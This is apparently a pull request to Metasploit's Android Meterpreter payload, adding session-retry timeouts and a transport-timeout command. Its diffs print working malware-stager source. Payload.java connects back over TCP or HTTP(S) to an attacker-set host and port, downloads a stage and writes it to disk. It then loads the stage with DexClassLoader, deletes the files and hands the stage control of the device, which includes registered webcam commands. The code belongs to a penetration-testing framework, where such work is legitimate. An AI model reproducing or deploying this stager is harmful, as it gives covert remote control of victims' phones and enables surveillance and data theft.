### PR TITLE
Add SessionRetryTotal and SessionRetryWait on Android

### DIFF
--- a/androidpayload/app/src/com/metasploit/stage/Payload.java
+++ b/androidpayload/app/src/com/metasploit/stage/Payload.java
@@ -24,9 +24,10 @@ public class Payload {
     public static final String RETRY_TOTAL =    "TTTT                                ";
     public static final String RETRY_WAIT =     "SSSS                                ";
 
+    public static long retry_total;
+    public static long retry_wait;
+
     private static String[] parameters;
-    private static int retryTotal;
-    private static int retryWait;
 
     public static void start(Context context) {
         startInPath(context.getFilesDir().toString());
@@ -53,6 +54,8 @@ public class Payload {
             String path = currentDir.getAbsolutePath();
             parameters = new String[]{path};
         }
+        int retryTotal;
+        int retryWait;
         try {
             retryTotal = Integer.parseInt(RETRY_TOTAL.substring(4).trim());
             retryWait = Integer.parseInt(RETRY_WAIT.substring(4).trim());
@@ -60,10 +63,11 @@ public class Payload {
             return;
         }
 
-        long retryEnd = System.currentTimeMillis() + TimeUnit.SECONDS.toMillis(retryTotal);
-        long retryDelay = TimeUnit.SECONDS.toMillis(retryWait);
+        long payloadStart = System.currentTimeMillis();
+        retry_total = TimeUnit.SECONDS.toMillis(retryTotal);
+        retry_wait = TimeUnit.SECONDS.toMillis(retryWait);
 
-        while (retryEnd > System.currentTimeMillis()) {
+        while (System.currentTimeMillis() < payloadStart + retry_total) {
             try {
                 if (URL.substring(4).trim().length() == 0) {
                     reverseTCP();
@@ -75,7 +79,7 @@ public class Payload {
                 e.printStackTrace();
             }
             try {
-                Thread.sleep(retryDelay);
+                Thread.sleep(retry_wait);
             } catch (InterruptedException e) {
                 return;
             }

--- a/androidpayload/app/src/com/metasploit/stage/Payload.java
+++ b/androidpayload/app/src/com/metasploit/stage/Payload.java
@@ -64,24 +64,21 @@ public class Payload {
         long retryDelay = TimeUnit.SECONDS.toMillis(retryWait);
 
         while (retryEnd > System.currentTimeMillis()) {
-            startReverseConn();
+            try {
+                if (URL.substring(4).trim().length() == 0) {
+                    reverseTCP();
+                } else {
+                    reverseHTTP();
+                }
+                return;
+            } catch (Exception e) {
+                e.printStackTrace();
+            }
             try {
                 Thread.sleep(retryDelay);
             } catch (InterruptedException e) {
                 return;
             }
-        }
-    }
-
-    private static void startReverseConn() {
-        try {
-            if (URL.substring(4).trim().length() == 0) {
-                reverseTCP();
-            } else {
-                reverseHTTP();
-            }
-        } catch (Exception e) {
-            e.printStackTrace();
         }
     }
 

--- a/androidpayload/app/src/com/metasploit/stage/Payload.java
+++ b/androidpayload/app/src/com/metasploit/stage/Payload.java
@@ -19,6 +19,7 @@ import dalvik.system.DexClassLoader;
 public class Payload {
 
     public static final String URL =            "ZZZZ                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                ";
+    public static final String CERT_HASH =      "WWWW                                        ";
     public static final String LHOST =          "XXXX127.0.0.1                       ";
     public static final String LPORT =          "YYYY4444                            ";
     public static final String RETRY_TOTAL =    "TTTT                                ";

--- a/androidpayload/app/src/com/metasploit/stage/Payload.java
+++ b/androidpayload/app/src/com/metasploit/stage/Payload.java
@@ -20,172 +20,172 @@ import dalvik.system.DexClassLoader;
 
 public class Payload {
 
-    public static final String LHOST =  		"XXXX127.0.0.1                       ";
-    public static final String LPORT =  		"YYYY4444                            ";
-    public static final String URL =    		"ZZZZ                                ";
-    public static final String RETRY_TOTAL = 	"TTTT                                ";
-    public static final String RETRY_WAIT = 	"SSSS                                ";
+    public static final String LHOST =          "XXXX127.0.0.1                       ";
+    public static final String LPORT =          "YYYY4444                            ";
+    public static final String URL =            "ZZZZ                                ";
+    public static final String RETRY_TOTAL =    "TTTT                                ";
+    public static final String RETRY_WAIT =     "SSSS                                ";
 
-	private static final int URI_CHECKSUM_INITJ = 88;
-	private static final String AB = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz";
+    private static final int URI_CHECKSUM_INITJ = 88;
+    private static final String AB = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz";
     private static final Random rnd = new Random();
 
     private static String[] parameters;
-	private static int retryTotal;
-	private static int retryWait;
+    private static int retryTotal;
+    private static int retryWait;
 
-	public static void start(Context context) {
+    public static void start(Context context) {
         startInPath(context.getFilesDir().toString());
     }
 
-	public static void startAsync() {
-		new Thread() {
-			@Override
-			public void run() {
-				// Execute the payload
-				Payload.main(null);
-			}
-		}.start();
-	}
+    public static void startAsync() {
+        new Thread() {
+            @Override
+            public void run() {
+                // Execute the payload
+                Payload.main(null);
+            }
+        }.start();
+    }
 
     public static void startInPath(String path) {
-        parameters = new String[] { path };
+        parameters = new String[]{path};
         startAsync();
     }
 
-	public static void main(String[] args) {
+    public static void main(String[] args) {
         if (args != null) {
             File currentDir = new File(".");
             String path = currentDir.getAbsolutePath();
-            parameters = new String[] { path };
+            parameters = new String[]{path};
         }
-		try {
-			retryTotal = Integer.parseInt(RETRY_TOTAL.substring(4).trim());
-			retryWait = Integer.parseInt(RETRY_WAIT.substring(4).trim());
-		} catch (NumberFormatException e) {
-			return;
-		}
+        try {
+            retryTotal = Integer.parseInt(RETRY_TOTAL.substring(4).trim());
+            retryWait = Integer.parseInt(RETRY_WAIT.substring(4).trim());
+        } catch (NumberFormatException e) {
+            return;
+        }
 
         long retryEnd = System.currentTimeMillis() + TimeUnit.SECONDS.toMillis(retryTotal);
-		long retryDelay = TimeUnit.SECONDS.toMillis(retryWait);
+        long retryDelay = TimeUnit.SECONDS.toMillis(retryWait);
 
-		while (retryEnd > System.currentTimeMillis()) {
-			startReverseConn();
-			try {
-				Thread.sleep(retryDelay);
-			} catch (InterruptedException e) {
-				return;
-			}
-		}
-	}
+        while (retryEnd > System.currentTimeMillis()) {
+            startReverseConn();
+            try {
+                Thread.sleep(retryDelay);
+            } catch (InterruptedException e) {
+                return;
+            }
+        }
+    }
 
-	private static void startReverseConn() {
-		try {
-			if (URL.substring(4).trim().length() == 0) {
+    private static void startReverseConn() {
+        try {
+            if (URL.substring(4).trim().length() == 0) {
                 reverseTCP();
             } else {
                 reverseHTTP();
             }
-		} catch (Exception e) {
-			e.printStackTrace();
-		}
-	}
+        } catch (Exception e) {
+            e.printStackTrace();
+        }
+    }
 
-	private static String randomString(int len) {
-		StringBuilder sb = new StringBuilder(len);
-		for (int i = 0; i < len; i++) {
+    private static String randomString(int len) {
+        StringBuilder sb = new StringBuilder(len);
+        for (int i = 0; i < len; i++) {
             sb.append(AB.charAt(rnd.nextInt(AB.length())));
         }
-		return sb.toString();
-	}
+        return sb.toString();
+    }
 
-	private static int checksumText(String s) {
-		int tmp = 0;
-		for (int i = 0; i < s.length(); i++) {
+    private static int checksumText(String s) {
+        int tmp = 0;
+        for (int i = 0; i < s.length(); i++) {
             tmp += (int) s.charAt(i);
         }
-		return tmp % 0x100;
-	}
+        return tmp % 0x100;
+    }
 
-	private static void reverseHTTP() throws Exception {
-		int checksum;
-		String URI;
-		HttpURLConnection urlConn;
-		String lurl = URL.substring(4).trim();
+    private static void reverseHTTP() throws Exception {
+        int checksum;
+        String URI;
+        HttpURLConnection urlConn;
+        String lurl = URL.substring(4).trim();
 
-		while (true) {
-			URI = randomString(4);
-			checksum = checksumText(URI);
-			if (checksum == URI_CHECKSUM_INITJ)
-				break;
-		}
+        while (true) {
+            URI = randomString(4);
+            checksum = checksumText(URI);
+            if (checksum == URI_CHECKSUM_INITJ)
+                break;
+        }
 
-		String FullURI = "/" + URI;
+        String FullURI = "/" + URI;
 
-		URL url = new URL(lurl + FullURI + "_" + randomString(16));
+        URL url = new URL(lurl + FullURI + "_" + randomString(16));
 
-		if (lurl.startsWith("https")) {
-			urlConn = (HttpsURLConnection) url.openConnection();
-			Class.forName("com.metasploit.stage.PayloadTrustManager")
-					.getMethod("useFor", new Class[] { URLConnection.class })
-					.invoke(null, urlConn);
-		} else {
+        if (lurl.startsWith("https")) {
+            urlConn = (HttpsURLConnection) url.openConnection();
+            Class.forName("com.metasploit.stage.PayloadTrustManager")
+                    .getMethod("useFor", new Class[]{URLConnection.class})
+                    .invoke(null, urlConn);
+        } else {
             urlConn = (HttpURLConnection) url.openConnection();
         }
 
-		urlConn.setDoInput(true);
-		urlConn.setRequestMethod("GET");
-		urlConn.connect();
-		DataInputStream in = new DataInputStream(urlConn.getInputStream());
+        urlConn.setDoInput(true);
+        urlConn.setRequestMethod("GET");
+        urlConn.connect();
+        DataInputStream in = new DataInputStream(urlConn.getInputStream());
 
-		loadStage(in, null, parameters);
-		urlConn.disconnect();
-	}
+        loadStage(in, null, parameters);
+        urlConn.disconnect();
+    }
 
-	private static void reverseTCP() throws Exception {
-		String lhost = LHOST.substring(4).trim();
-		String lport = LPORT.substring(4).trim();
-		Socket msgsock = new Socket(lhost, Integer.parseInt(lport));
-		DataInputStream in = new DataInputStream(msgsock.getInputStream());
-		OutputStream out = new DataOutputStream(msgsock.getOutputStream());
-		loadStage(in, out, parameters);
-	}
+    private static void reverseTCP() throws Exception {
+        String lhost = LHOST.substring(4).trim();
+        String lport = LPORT.substring(4).trim();
+        Socket msgsock = new Socket(lhost, Integer.parseInt(lport));
+        DataInputStream in = new DataInputStream(msgsock.getInputStream());
+        OutputStream out = new DataOutputStream(msgsock.getOutputStream());
+        loadStage(in, out, parameters);
+    }
 
-	private static void loadStage(DataInputStream in, OutputStream out, String[] parameters) throws Exception {
+    private static void loadStage(DataInputStream in, OutputStream out, String[] parameters) throws Exception {
 
-		String path = parameters[0];
-		String filePath = path + File.separatorChar + "payload.jar";
-		String dexPath = path + File.separatorChar + "payload.dex";
+        String path = parameters[0];
+        String filePath = path + File.separatorChar + "payload.jar";
+        String dexPath = path + File.separatorChar + "payload.dex";
 
-		// Read the class name
-		int coreLen = in.readInt();
-		byte[] core = new byte[coreLen];
-		in.readFully(core);
-		String classFile = new String(core);
+        // Read the class name
+        int coreLen = in.readInt();
+        byte[] core = new byte[coreLen];
+        in.readFully(core);
+        String classFile = new String(core);
 
-		// Read the stage
-		coreLen = in.readInt();
-		core = new byte[coreLen];
-		in.readFully(core);
+        // Read the stage
+        coreLen = in.readInt();
+        core = new byte[coreLen];
+        in.readFully(core);
 
-		File file = new File(filePath);
-		if (!file.exists()) {
-			file.createNewFile();
-		}
-		FileOutputStream fop = new FileOutputStream(file);
-		fop.write(core);
-		fop.flush();
-		fop.close();
+        File file = new File(filePath);
+        if (!file.exists()) {
+            file.createNewFile();
+        }
+        FileOutputStream fop = new FileOutputStream(file);
+        fop.write(core);
+        fop.flush();
+        fop.close();
 
-		// Load the stage
-		DexClassLoader classLoader = new DexClassLoader(filePath, path, path,
-				Payload.class.getClassLoader());
-		Class<?> myClass = classLoader.loadClass(classFile);
-		final Object stage = myClass.newInstance();
-		file.delete();
-		new File(dexPath).delete();
-		myClass.getMethod("start",
-				new Class[] { DataInputStream.class, OutputStream.class, String[].class })
-				.invoke(stage, in, out, parameters);
-	}
+        // Load the stage
+        DexClassLoader classLoader = new DexClassLoader(filePath, path, path,
+                Payload.class.getClassLoader());
+        Class<?> myClass = classLoader.loadClass(classFile);
+        final Object stage = myClass.newInstance();
+        file.delete();
+        new File(dexPath).delete();
+        myClass.getMethod("start",
+                new Class[]{DataInputStream.class, OutputStream.class, String[].class})
+                .invoke(stage, in, out, parameters);
+    }
 }

--- a/androidpayload/library/pom.xml
+++ b/androidpayload/library/pom.xml
@@ -32,6 +32,12 @@
 			<artifactId>Metasploit-Java-Meterpreter-stdapi</artifactId>
 			<version>${project.version}</version>
 		</dependency>
+		<dependency>
+			<groupId>com.metasploit</groupId>
+			<artifactId>Metasploit-AndroidPayload</artifactId>
+			<version>${project.version}</version>
+			<scope>provided</scope>
+		</dependency>
 	</dependencies>
 	<build>
 		<finalName>${project.artifactId}</finalName>

--- a/androidpayload/library/src/com/metasploit/meterpreter/AndroidMeterpreter.java
+++ b/androidpayload/library/src/com/metasploit/meterpreter/AndroidMeterpreter.java
@@ -53,7 +53,13 @@ public class AndroidMeterpreter extends Meterpreter {
     private static Context context;
 
     private void findContext() throws Exception {
-        final Class<?> activityThreadClass = Class.forName("android.app.ActivityThread");
+        Class<?> activityThreadClass;
+        try {
+            activityThreadClass = Class.forName("android.app.ActivityThread");
+        } catch (ClassNotFoundException e) {
+            // No context (running as root?)
+            return;
+        }
         final Method currentApplication = activityThreadClass.getMethod("currentApplication");
         context = (Context) currentApplication.invoke(null, (Object[]) null);
         if (context == null) {
@@ -89,7 +95,6 @@ public class AndroidMeterpreter extends Meterpreter {
             findContext();
         } catch (Exception e) {
             e.printStackTrace();
-            // No context (running as root?)
         }
         startExecuting();
     }

--- a/androidpayload/library/src/com/metasploit/meterpreter/AndroidMeterpreter.java
+++ b/androidpayload/library/src/com/metasploit/meterpreter/AndroidMeterpreter.java
@@ -17,6 +17,7 @@ import com.metasploit.meterpreter.android.webcam_get_frame_android;
 import com.metasploit.meterpreter.android.webcam_list_android;
 import com.metasploit.meterpreter.android.webcam_start_android;
 import com.metasploit.meterpreter.android.webcam_stop_android;
+import com.metasploit.meterpreter.core.core_transport_set_timeouts;
 import com.metasploit.meterpreter.stdapi.Loader;
 import com.metasploit.meterpreter.stdapi.channel_create_stdapi_fs_file;
 import com.metasploit.meterpreter.stdapi.channel_create_stdapi_net_tcp_client;
@@ -104,6 +105,7 @@ public class AndroidMeterpreter extends Meterpreter {
         getCommandManager().resetNewCommands();
         CommandManager mgr = getCommandManager();
         Loader.cwd = new File(writeableDir);
+        mgr.registerCommand("core_transport_set_timeouts", core_transport_set_timeouts.class);
         mgr.registerCommand("channel_create_stdapi_fs_file", channel_create_stdapi_fs_file.class);
         mgr.registerCommand("channel_create_stdapi_net_tcp_client", channel_create_stdapi_net_tcp_client.class);
         mgr.registerCommand("channel_create_stdapi_net_tcp_server", channel_create_stdapi_net_tcp_server.class);

--- a/androidpayload/library/src/com/metasploit/meterpreter/AndroidMeterpreter.java
+++ b/androidpayload/library/src/com/metasploit/meterpreter/AndroidMeterpreter.java
@@ -49,18 +49,7 @@ public class AndroidMeterpreter extends Meterpreter {
     private static String writeableDir;
     private static Context context;
 
-    private void startExecutingOnThread() {
-        new Thread() {
-            @Override
-            public void run() {
-                try {
-                    startExecuting();
-                } catch (Exception e) {
-                    e.printStackTrace();
-                }
-            }
-        }.start();
-    }
+    private static Thread executionThread;
 
     private void findContext() throws Exception {
         final Class<?> activityThreadClass = Class.forName("android.app.ActivityThread");
@@ -76,7 +65,7 @@ public class AndroidMeterpreter extends Meterpreter {
                     } catch (Exception e) {
                         e.printStackTrace();
                     }
-                    startExecutingOnThread();
+                    executionThread.start();
                 }
             });
         } else {
@@ -91,8 +80,20 @@ public class AndroidMeterpreter extends Meterpreter {
     public AndroidMeterpreter(DataInputStream in, OutputStream rawOut, String[] parameters, boolean redirectErrors) throws Exception {
         super(in, rawOut, true, redirectErrors, false);
         writeableDir = parameters[0];
+
+        executionThread = new Thread() {
+            @Override
+            public void run() {
+                try {
+                    startExecuting();
+                } catch (Exception e) {
+                    e.printStackTrace();
+                }
+            }
+        };
         try {
             findContext();
+            executionThread.join();
         } catch (Exception e) {
             e.printStackTrace();
             startExecuting();

--- a/androidpayload/library/src/com/metasploit/meterpreter/AndroidMeterpreter.java
+++ b/androidpayload/library/src/com/metasploit/meterpreter/AndroidMeterpreter.java
@@ -67,7 +67,6 @@ public class AndroidMeterpreter extends Meterpreter {
             // Post to the UI/Main thread and try and retrieve the Context
             final Handler handler = new Handler(Looper.getMainLooper());
             handler.post(new Runnable() {
-                @Override
                 public void run() {
                     try {
                         context = (Context) currentApplication.invoke(null, (Object[]) null);
@@ -98,6 +97,11 @@ public class AndroidMeterpreter extends Meterpreter {
             e.printStackTrace();
         }
         startExecuting();
+    }
+
+    @Override
+    protected String getPayloadTrustManager() {
+        return "com.metasploit.stage.PayloadTrustManager";
     }
 
     @Override

--- a/androidpayload/library/src/com/metasploit/meterpreter/core/core_transport_set_timeouts.java
+++ b/androidpayload/library/src/com/metasploit/meterpreter/core/core_transport_set_timeouts.java
@@ -1,0 +1,24 @@
+package com.metasploit.meterpreter.core;
+
+import com.metasploit.meterpreter.Meterpreter;
+import com.metasploit.meterpreter.TLVPacket;
+import com.metasploit.meterpreter.TLVType;
+import com.metasploit.meterpreter.command.Command;
+import com.metasploit.stage.Payload;
+
+import java.util.concurrent.TimeUnit;
+
+public class core_transport_set_timeouts implements Command {
+
+    public int execute(Meterpreter meterpreter, TLVPacket request, TLVPacket response) throws Exception {
+        Integer retryTotal = (Integer)request.getValue(TLVType.TLV_TYPE_TRANS_RETRY_TOTAL, null);
+        Integer retryWait = (Integer)request.getValue(TLVType.TLV_TYPE_TRANS_RETRY_WAIT, null);
+        if (retryTotal != null) {
+            Payload.retry_total = TimeUnit.SECONDS.toMillis(retryTotal.intValue());
+        }
+        if (retryWait != null) {
+            Payload.retry_wait = TimeUnit.SECONDS.toMillis(retryWait.intValue());
+        }
+        return ERROR_SUCCESS;
+    }
+}

--- a/meterpreter/meterpreter/src/main/java/com/metasploit/meterpreter/Meterpreter.java
+++ b/meterpreter/meterpreter/src/main/java/com/metasploit/meterpreter/Meterpreter.java
@@ -106,6 +106,10 @@ public class Meterpreter {
         }
     }
 
+    protected String getPayloadTrustManager() {
+        return "com.metasploit.meterpreter.PayloadTrustManager";
+    }
+
     /**
      * Write a TLV packet to this meterpreter's output stream.
      *
@@ -188,7 +192,7 @@ public class Meterpreter {
                     // load the trust manager via reflection, to avoid loading
                     // it when it is not needed (it requires Sun Java 1.4+)
                     try {
-                        Class.forName("com.metasploit.meterpreter.PayloadTrustManager").getMethod("useFor", new Class[]{URLConnection.class}).invoke(null, new Object[]{uc});
+                        Class.forName(getPayloadTrustManager()).getMethod("useFor", new Class[]{URLConnection.class}).invoke(null, new Object[]{uc});
                     } catch (Exception ex) {
                         ex.printStackTrace(getErrorStream());
                     }

--- a/meterpreter/meterpreter/src/main/java/com/metasploit/meterpreter/TLVType.java
+++ b/meterpreter/meterpreter/src/main/java/com/metasploit/meterpreter/TLVType.java
@@ -43,6 +43,19 @@ public interface TLVType {
     public static final int TLV_TYPE_MIGRATE_PID = TLVPacket.TLV_META_TYPE_UINT | 402;
     public static final int TLV_TYPE_MIGRATE_LEN = TLVPacket.TLV_META_TYPE_UINT | 403;
 
+    public static final int TLV_TYPE_TRANS_TYPE          = TLVPacket.TLV_META_TYPE_UINT   | 430;
+    public static final int TLV_TYPE_TRANS_URL           = TLVPacket.TLV_META_TYPE_STRING | 431;
+    public static final int TLV_TYPE_TRANS_UA            = TLVPacket.TLV_META_TYPE_STRING | 432;
+    public static final int TLV_TYPE_TRANS_COMM_TIMEOUT  = TLVPacket.TLV_META_TYPE_UINT   | 433;
+    public static final int TLV_TYPE_TRANS_SESSION_EXP   = TLVPacket.TLV_META_TYPE_UINT   | 434;
+    public static final int TLV_TYPE_TRANS_CERT_HASH     = TLVPacket.TLV_META_TYPE_RAW    | 435;
+    public static final int TLV_TYPE_TRANS_PROXY_HOST    = TLVPacket.TLV_META_TYPE_STRING | 436;
+    public static final int TLV_TYPE_TRANS_PROXY_USER    = TLVPacket.TLV_META_TYPE_STRING | 437;
+    public static final int TLV_TYPE_TRANS_PROXY_PASS    = TLVPacket.TLV_META_TYPE_STRING | 438;
+    public static final int TLV_TYPE_TRANS_RETRY_TOTAL   = TLVPacket.TLV_META_TYPE_UINT   | 439;
+    public static final int TLV_TYPE_TRANS_RETRY_WAIT    = TLVPacket.TLV_META_TYPE_UINT   | 440;
+    public static final int TLV_TYPE_TRANS_GROUP         = TLVPacket.TLV_META_TYPE_GROUP  | 441;
+
     public static final int TLV_TYPE_CIPHER_NAME = TLVPacket.TLV_META_TYPE_STRING | 500;
     public static final int TLV_TYPE_CIPHER_PARAMETERS = TLVPacket.TLV_META_TYPE_GROUP | 501;
 


### PR DESCRIPTION
This change adds support for the SessionRetryTotal and SessionRetryWait advanced options.
To make this work the meterpreter payload has to run on a single thread, otherwise we end up spawning multiple sessions (one every SessionRetryWait period).
Verification:
 - [x] Ensure you can still get a reverse_tcp session
 - [ ] Set a non-default value for SessionRetryTotal and SessionRetryWait and ensure the payload waits the SessionRetryWait second period between retries for up to a total of SessionRetryTotal seconds.